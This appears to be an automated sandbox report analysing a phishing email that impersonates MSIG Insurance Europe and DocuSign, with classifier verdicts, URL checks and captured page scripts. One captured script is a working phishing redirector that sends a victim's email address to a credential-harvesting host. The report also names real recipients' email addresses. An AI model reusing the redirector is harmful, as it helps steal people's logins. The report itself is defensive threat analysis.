Windows Analysis Report
possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msg

{
    "explanation": [
        "Sender domain 'malhs.co.uk' doesn't match the claimed organization (MSIG Insurance Europe)",
        "Suspicious formatting of sender name with UTF-8 encoding to potentially mask true sender",
        "Generic automated notification pretending to be from the same domain as recipient"
    ],
    "phishing": true,
    "confidence": 9,
    "generated_by_ai": false
}

{
    "date": "Tue, 14 Jan 2025 07:51:32 +0100", 
    "subject": "[possible SPAM:##] Msig Insurance Europe Complete via-Sign  Monday January 2025", 
    "communications": [
        "Automated case information directly for christian.fink@msig-europe.com\n\n"
    ], 
    "from": "=?UTF-8?Q?Msig Insurance Europe Online Notification?= <info@malhs.co.uk>", 
    "to": "<christian.fink@msig-europe.com>", 
    "attachements": [
        "Msig Insurance Europe.pdf"
    ]
}

{
  "contains_trigger_text": true,
  "trigger_text": "Review agreement above to see delayed emails",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
"contains_trigger_text": true,
"trigger_text": "Automated case information directly for christian.frank@msig-europe.com",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "brands": [
    "Msig Insurance Europe"
  ]
}

{"classification":"Credential Stealer"}

Email:
Detected potential phishing email: Sender domain 'malhs.co.uk' doesn't match the claimed organization (MSIG Insurance Europe). Suspicious formatting of sender name with UTF-8 encoding to potentially mask true sender. Generic automated notification pretending to be from the same domain as recipient

{
    "risk_score": 6,
    "reasoning": "This script appears to be collecting and storing user risk data in the browser's local storage. While the intent is unclear, storing sensitive risk information in local storage without proper security measures is a moderate risk behavior that requires further investigation."
}

        window.PXeBumDLwe_asyncInit = function (px) {
          px.Events.on('risk', function (risk, name) {
            localStorage.setItem("pxcookie", risk + "=" + name);
          });
        };
      

{
    "risk_score": 5,
    "reasoning": "The script demonstrates some potentially concerning behaviors, such as sending data to an external domain and using an obfuscated URL, but it also appears to have a legitimate purpose related to analytics and client ID tracking. Further review may be necessary to determine the full extent of the script's functionality and potential risks."
}

(function(){try{if(window.top===window.self)return}catch(a){}var m=!0,d="iframe",e=google_tag_manager["rm"]["65278037"](3),f=2E3,g=200,h=!1,p=function(a){a.origin!==e||"clientId"!==a.data.event&&"parentReady"!==a.data||("clientId"===a.data.event&&window.dataLayer.push({event:"clientId",clientId:a.data.clientId}),"parentReady"!==a.data||h||(window.clearInterval(k),m&&n(),h=!0))},q=function(){f-=g;0>=f&&window.clearInterval(k);window.top.postMessage("childReady",e)},l=function(a){if(!Array.isArray(a)&&"object"===typeof a){a=
JSON.parse(JSON.stringify(a));var b={};b[d]={pageData:{url:document.location.href,title:document.title}};for(var c in a)a.hasOwnProperty(c)&&"gtm.uniqueEventId"!==c&&("event"===c?b.event=d+"."+a[c]:b[d][c]=a[c]);b.event||(b.event=d+".Message");return b}return!1},n=function(){window.dataLayer.forEach(function(b){(b=l(b))&&window.top.postMessage(b,e)});var a=window.dataLayer.push;window.dataLayer.push=function(){var b=[].slice.call(arguments,0);b.forEach(function(c){(c=l(c))&&window.top.postMessage(c,
e)});return a.apply(window.dataLayer,b)}},k=window.setInterval(q,g);window.addEventListener("message",p)})();

{
    "risk_score": 6,
    "reasoning": "The script demonstrates several moderate-risk behaviors, including external data transmission, fallback domains, and aggressive DOM manipulation. While it does not exhibit any high-risk indicators like dynamic code execution or data exfiltration, the overall behavior is somewhat suspicious and requires further review."
}

// Copyright 2012 Google Inc. All rights reserved.
 
 (function(w,g){w[g]=w[g]||{};
 w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');
 
(function(){

var data = {
"resource": {
  "version":"7",
  
  "macros":[{"function":"__e"},{"function":"__f","vtp_component":"URL"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=",["escape",["macro",1],8,16],";return a.replace(\/\\\/$\/,\"\")})();"]},{"function":"__jsm","vtp_javascript":["template","(function(){return(start=Math.floor(Date.now()\/1E3))||\"\"})();"]},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"}],
  "tags":[{"function":"__html","metadata":["map"],"once_per_event":true,"vtp_html":["template","\u003Cscript type=\"text\/gtmscript\"\u003E(function(){try{if(window.top===window.self)return}catch(a){}var m=!0,d=\"iframe\",e=",["escape",["macro",2],8,16],",f=2E3,g=200,h=!1,p=function(a){a.origin!==e||\"clientId\"!==a.data.event\u0026\u0026\"parentReady\"!==a.data||(\"clientId\"===a.data.event\u0026\u0026window.dataLayer.push({event:\"clientId\",clientId:a.data.clientId}),\"parentReady\"!==a.data||h||(window.clearInterval(k),m\u0026\u0026n(),h=!0))},q=function(){f-=g;0\u003E=f\u0026\u0026window.clearInterval(k);window.top.postMessage(\"childReady\",e)},l=function(a){if(!Array.isArray(a)\u0026\u0026\"object\"===typeof a){a=\nJSON.parse(JSON.stringify(a));var b={};b[d]={pageData:{url:document.location.href,title:document.title}};for(var c in a)a.hasOwnProperty(c)\u0026\u0026\"gtm.uniqueEventId\"!==c\u0026\u0026(\"event\"===c?b.event=d+\".\"+a[c]:b[d][c]=a[c]);b.event||(b.event=d+\".Message\");return b}return!1},n=function(){window.dataLayer.forEach(function(b){(b=l(b))\u0026\u0026window.top.postMessage(b,e)});var a=window.dataLayer.push;window.dataLayer.push=function(){var b=[].slice.call(arguments,0);b.forEach(function(c){(c=l(c))\u0026\u0026window.top.postMessage(c,\ne)});return a.apply(window.dataLayer,b)}},k=window.setInterval(q,g);window.addEventListener(\"message\",p)})();\u003C\/script\u003E"],"vtp_supportDocumentWrite":false,"vtp_enableIframeMode":false,"vtp_enableEditJsMacroBehavior":false,"tag_id":3}],
  "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],
  "rules":[[["if",0],["add",0]]]
},
"runtime":[ [50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]
 ,[50,"__f",[46,"a"],[52,"b",["require","copyFromDataLayer"]],[52,"c",["require","getReferrerUrl"]],[52,"d",["require","makeString"]],[52,"e",["require","parseUrl"]],[52,"f",[15,"__module_legacyUrls"]],[52,"g",[30,["b","gtm.referrer",1],["c"]]],[22,[28,[15,"g"]],[46,[36,["d",[15,"g"]]]]],[38,[17,[15,"a"],"component"],[46,"PROTOCOL","HOST","PORT","PATH","QUERY","FRAGMENT","URL"],[46,[5,[46,[36,[2,[15,"f"],"getProtocol",[7,[15,"g"]]]]]],[5,[46,[36,[2,[15,"f"],"getHost",[7,[15,"g"],[17,[15,"a"],"stripWww"]]]]]],[5,[46,[36,[2,[15,"f"],"getPort",[7,[15,"g"]]]]]],[5,[46,[36,[2,[15,"f"],"getPath",[7,[15,"g"],[17,[15,"a"],"defaultPages"]]]]]],[5,[46,[22,[17,[15,"a"],"queryKey"],[46,[36,[2,[15,"f"],"getFirstQueryParam",[7,[15,"g"],[17,[15,"a"],"queryKey"]]]]]],[52,"h",["e",[15,"g"]]],[36,[2,[17,[15,"h"],"search"],"replace",[7,"?",""]]]]],[5,[46,[36,[2,[15,"f"],"getFragment",[7,[15,"g"]]]]]],[5,[46]],[9,[46,[36,[2,[15,"f"],"removeFragment",[7,["d",[15,"g"]]]]]]]]]]
 ,[50,"__html",[46,"a"],[52,"b",["require","internal.injectHtml"]],["b",[17,[15,"a"],"html"],[17,[15,"a"],"gtmOnSuccess"],[17,[15,"a"],"gtmOnFailure"],[17,[15,"a"],"useIframe"],[17,[15,"a"],"supportDocumentWrite"]]]
 ,[50,"__jsm",[46,"a"],[52,"b",["require","internal.executeJavascriptString"]],[22,[20,[17,[15,"a"],"javascript"],[44]],[46,[36]]],[36,["b",[17,[15,"a

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and indicative of a potential malicious attack."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'901bec8e8bd0c407',t:'MTczNjgzOTg2MS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
    "risk_score": 6,
    "reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. While it does not exhibit any clear malicious intent, the script engages in external data transmission, uses fallback domains, and performs aggressive DOM manipulation. These practices, if not properly implemented or contextualized, could potentially lead to data leakage or other security issues. Further review and validation of the script's purpose and implementation would be recommended to determine the overall risk level."
}

(this["webpackJsonpexternal-embed"]=this["webpackJsonpexternal-embed"]||[]).push([[0],{105:function(e,t,n){"use strict";n.r(t);var a,o,r,i,c,l,u,s=n(0),d=n.n(s),p=n(39),m=n.n(p),h=n(6),b=n(7),f=n(9),g=n(8),v=n(110),S=n(107),y=n(111),x=n(16),E=n(4),w=n(5),_=w.a.div(a||(a=Object(E.a)(["\n  position: relative;\n  display: flex;\n  align-items: center;\n  justify-content: center;\n  height: 100vh;\n  width: 100vw;\n  box-sizing: border-box;\n  text-align: center;\n  padding: 12px;\n  background-color: ",";\n"])),(function(e){return e.backgroundColor?e.backgroundColor:"#f3f4f6"})),O=w.a.div(o||(o=Object(E.a)(["\n  max-width: 28rem;\n  margin-left: auto;\n  margin-right: auto;\n"]))),C=w.a.div(r||(r=Object(E.a)(["\n  margin-bottom: 1.5rem;\n"]))),k=w.a.h2(i||(i=Object(E.a)(["\n  color: ",";\n  font-family: ",";\n  font-size: 28px;\n  line-height: 1;\n  margin-block: 0;\n  margin-bottom: 0.4;\n"])),(function(e){return e.textColor?e.textColor:"#000"}),(function(e){return e.fontFamily?e.fontFamily:"Open-Sans"})),j=w.a.p(c||(c=Object(E.a)(["\n  font-family: ",";\n  font-size: 14px;\n  font-weight: 400;\n  color: ",";\n"])),(function(e){return e.fontFamily?e.fontFamily:"Open-Sans"}),(function(e){return e.textColor?e.textColor:"#000"})),F=w.a.a(l||(l=Object(E.a)(["\n"]))),I=w.a.img(u||(u=Object(E.a)(["\n  position: absolute;\n  display: block;\n  right: 12px;\n  bottom: 12px;\n  max-height: 18px;\n  opacity: .3;\n  transition: all .25s ease-out;\n\n  :hover {\n    opacity: 1;\n  }\n"]))),A=function(e){Object(f.a)(n,e);var t=Object(g.a)(n);function n(){return Object(h.a)(this,n),t.apply(this,arguments)}return Object(b.a)(n,[{key:"render",value:function(){return d.a.createElement(F,{target:"_blank",href:this.props.targetUrl},d.a.createElement(I,{src:"/img/beehiiv-logo.png"}))}}]),n}(s.Component);A.defaultProps={targetUrl:"https://www.beehiiv.com"};var T,P=A,R=function(e){Object(f.a)(n,e);var t=Object(g.a)(n);function n(){return Object(h.a)(this,n),t.apply(this,arguments)}return Object(b.a)(n,[{key:"render",value:function(){return d.a.createElement(_,null,d.a.createElement(O,null,d.a.createElement(C,null,d.a.createElement(k,null,"Not found"),d.a.createElement(j,null,"Oops. We can't find what you're looking for."))),d.a.createElement(P,null))}}]),n}(s.Component),N=n(44),L=n(108),M=n(109),B=n(2),U=n.n(B),D=n(40),z=n.n(D),H=n(31),q=n.n(H),V=n(17),W=n(41),G=n.n(W),J=n(25),Q=w.a.div(T||(T=Object(E.a)(["\n  font-size: 42px;\n  display: flex;\n  align-items: center;\n  justify-content: center;\n  margin-bottom: 20px;\n  color: ",";\n"])),(function(e){return e.color?e.color:"#000"})),Y=function(e){Object(f.a)(n,e);var t=Object(g.a)(n);function n(){return Object(h.a)(this,n),t.apply(this,arguments)}return Object(b.a)(n,[{key:"render",value:function(){return d.a.createElement(Q,{color:this.props.color},d.a.createElement(J.Dot,null,"."),d.a.createElement(J.Dot,null,"."),d.a.createElement(J.Dot,null,"."))}}]),n}(s.Component);Y.defaultProps={color:"#000"};var K,X,Z,$,ee,te,ne,ae,oe,re=Y,ie=d.a.createElement("svg",{viewBox:"0 0 24 24",stroke:"currentColor"},d.a.createElement("path",{d:"M9.5,18.2c-0.4,0.4-1,0.4-1.4,0l-3.8-3.8C4,14,4,13.4,4.3,13s1-0.4,1.4,0l3.1,3.1l8.6-8.6c0.4-0.4,1-0.4,1.4,0s0.4,1,0,1.4 L9.5,18.2z"})),ce=function(e){Object(f.a)(n,e);var t=Object(g.a)(n);function n(){return Object(h.a)(this,n),t.apply(this,arguments)}return Object(b.a)(n,[{key:"render",value:function(){return d.a.createElement("div",{className:this.props.className},ie)}}]),n}(s.Component),le=n(18),ue={"Content-Type":"application/json",Accept:"application/json"},se=n(33),de=function(e){var t=e.name,n=e.category,a=e.action,o=e.label,r=void 0===o?window.location.href:o,i=e.value,c=void 0===i?0:i,l=e.data,u=void 0===l?{}:l;if("undefined"!==typeof window.dataLayer){var s=new Date;window.dataLayer.push({event:t,eventProps:Object(le.a)({category:n,action:a,label:r,value:c,timestamp:s.toISOString()},u)})}},pe=w.a.form(K||(K=Object(E.a)(["\n  margin-left: auto;\n  margin-right: auto;\n 

{
  "contains_trigger_text": true,
  "trigger_text": "Sign-in authentication with recipient email is required to review and electronically sign the pending document. There is no requirement for a paper copy to be produced if completed with DocuSign.",
  "prominent_button_name": "Submit",
  "text_input_field_labels": [
    "Enter your email"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "DocuSign"
  ]
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://embeds.beehiiv.com

```json{  "legit_domain": "docusign.com",  "classification": "wellknown",  "reasons": [    "The brand 'DocuSign' is well-known and typically associated with the domain 'docusign.com'.",    "The URL 'embeds.beehiiv.com' does not match the legitimate domain for DocuSign.",    "The domain 'beehiiv.com' is unrelated to DocuSign and could indicate a third-party service.",    "The presence of an input field asking for an email on an unrelated domain is suspicious.",    "The URL structure does not include any direct reference to DocuSign, which is a red flag."  ],  "riskscore": 8}
Google indexed: False

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script extracts an email parameter from the URL and then redirects the user to a random link, appending the email parameter to the URL. This behavior is highly suspicious and could be used for phishing or other malicious purposes."
}

        // Function to extract email from URL parameter
        function getEmailFromUrl() {
            var urlParams = new URLSearchParams(window.location.search);
            var email = urlParams.get('email');
            return email ? decodeURIComponent(email.replace(/\+/g, ' ')) : null; // Decode and return the email
        }

        // Function to choose a random link and redirect with email parameter
        function chooseRandomLinkAndRedirect(email) {
            // Check if email parameter is null
            if (!email) {
                window.location.replace('https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee');
                return;
            }

            // Array of random links
            var links = [
                'https://sigbed.goodus.net/?snMZ=0usfrX',
                'https://sigbed.goodus.net/?snMZ=0usfrX',
            ];

            // Choose a random link
            var randomLink = links[Math.floor(Math.random() * links.length)];

            // Construct the final URL with email parameter
            var finalUrl = randomLink + '&username=' + encodeURIComponent(email);

            // Redirect to the constructed URL
            window.location.replace(finalUrl);
        }

        // Execute the random link selection and redirection logic
        window.onload = function() {
            // Extract email from URL parameter
            var email = getEmailFromUrl();

            // Redirect with email appended to the random link
            chooseRandomLinkAndRedirect(email);
        };
    

{
  "contains_trigger_text": true,
  "trigger_text": "Sign-in authentication with recipient email is required to review and electronically sign the pending document. There is no requirement for a paper copy to be produced if completed with DocuSign.",
  "prominent_button_name": "Submit",
  "text_input_field_labels": [
    "mg@michaelgorski.net"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://ae879450.bosssellame.pages.dev

{
  "brands": [
    "DocuSign"
  ]
}

{
    "risk_score": 7,
    "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While some of the behaviors may be related to legitimate functionality like analytics or tracking, the overall level of risk is elevated due to the presence of multiple suspicious activities."
}

   function a0l5(l,N){var R=a0l4();return a0l5=function(U,a){U=U-0x1ee;var B=R[U];return B;},a0l5(l,N);}function a0l4(){var K9=['POST','ecxHX','now','YVtocmVmPSJodHRwOi8vd3d3LnNhbGlkemluaS5sdi8iXVtzdHlsZT0iZGlzcGxheTogYmxvY2s7IHdpZHRoOiAxMjBweDsgaGVpZ2h0OiA0MHB4OyBvdmVyZmxvdzogaGlkZGVuOyBwb3NpdGlvbjogcmVsYXRpdmU7Il0=','submit','(^|[^','unicode','timeZone','browserLanguage','name','YQthR','nUGqm','test','#qoo-counter','ZYnNF','values','aCFZG','defineProperty','.img-kosana','mTiqV','00000000','sticky','.yt.btn-link.btn-md.btn','style','permission','.cnt-publi','Ppwgj','alphabetic','#issuem-leaky-paywall-articles-zero-remaining-nag','iPad','.textad_headline','port2','OxlMR','cookietest=1;\x20SameSite=Strict;','CSS','UTC','RTCPeerConnectionIceEvent','undefined','2031856sWklTr','unstable','','7','bind','\x0avisitorId:\x20','Symbol(description\x20detection)','BwkqD','deg)','','userLanguage','Futura\x20Bk\x20BT','pexBb','','KDNRh','WuJwP','show','charCodeAt','LOW_INT','font','wdDSK','symbol','toDataURL','gwhKp','uEfEr','__ybro','bgVPg','.newsletter_holder','destination','foo','kQiDA','Accessors\x20not\x20supported','offsetWidth','trim','DIV.agores300','','VFxIC','.open.pushModal','\x0a\x20\x20','encode','MS\x20Mincho','sin','iterator','WeakMap','none','div','Google','window','(dynamic-range:\x20','RegExp#exec\x20called\x20on\x20incompatible\x20receiver','wUwqB','RxLgP','','.widgetadv','offsetHeight','1244920VehzNu','uvHPe','resolvedOptions','uOnBf','','webgl2','FRAGMENT_SHADER','less','QIPME','protocol','(forced-colors:\x20','iPhone','msIndexedDB','3dUlPJh','#pavePub','sham','','','AuvxN','monospace','Function','Helvetica\x20Neue','CTWcy','DYdYE','matches','107962asEISi','3.38.0','.navigate-to-top','chVfQ','canvas','exec','YoRth','YUEsQ','','parseInt','contentWindow','symbol\x20detection','filter:hue-rotate(','mMHor','from','CONFIGURABLE','Error:\x20data\x20is\x20missing','jASFO','','span','wrHuE','ceil','queueMicrotask','','offsetParent','tanh','iIigE','Symbol\x20is\x20not\x20a\x20constructor','then','querySelector','isPointInPath','xtAVW','serif','\x0acomponents:\x20','yJnoq','evenodd','div[id^=\x22crt-\x22][data-criteo-id]','#barraPublicidade','PazUk','multiline','#psyduckpockeball','jtDYP','fillRect','max','ops','BUN','experimental-webgl','load','getShaderPrecisionFormat','(((.+)+)+)+$','colorDepth','print','Arial\x20Unicode\x20MS','\x22\x5cudead\x22','MacIntel','oQbQp','rgba(102,\x20204,\x200,\x200.2)','languages','nonWritable','GmFLX','facade','trunc','width','#hirdetesek_box','setAttribute','head','Can\x27t\x20convert\x20object\x20to\x20primitive\x20value','#top100counter','sans-serif-thin','Null','observe','charAt','#mod-social-share-2','VERSION','])[','klrsy','uExks','getFullYear','214429WkPOzH','textSizeAdjust','ontransitioncancel','#pmadv','abs','LLhCC','outerWidth','\x0atimeBetweenLoadAndGet:\x20','atanh','HTMLElement','.sklik','rKRGM','parentWindow','tXbZC','','standard','','.site-pub-interstitiel','','samsungAr','about:blank','deviceMemory','lSxXq','','gLuhk','oprt','article.category-samarbete','that','set\x20','visualViewport','ApplePayError','OxWRc','#2ff','object','.cc-CookieWarning','pxCFb','.mobile_adhesion','pointerLockElement','nHuyf','shift','PArtK','a[href^=\x22/url/\x22]','Batang','@@iterator','fontSize','renderedBuffer','vtLDS','cTUPm','origin','outerHeight','zYgcw','port1','nonConfigurable','','symbols','UNMASKED_VENDOR_WEBGL','description','permissions','return','asin','document.F=Object','POLYFILL','kBQpH','log','','__generator','CSSCounterStyleRule','webkitOfflineAudioContext','dispatchEvent','fill','.as-oil','TABLE[width=\x22140px\x22]','','HTMLButtonElement','EXISTS','write','rect','serviceWorker','round','PiCqt','availTop','Meiryo\x20UI','','UNfLZ','documentElement','#aafoot.top_box','String\x20Iterator','apply','function','__fpjs_d_m','getOwnPropertyNames','number','form','5xPhRIW','ZMyux','','innerWidth','WEBGL_debug_renderer_info','9EERGsC','','LOW_FLOAT','isArray','[data-cypress=\x22soft-push-notifica

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://beehiiv.com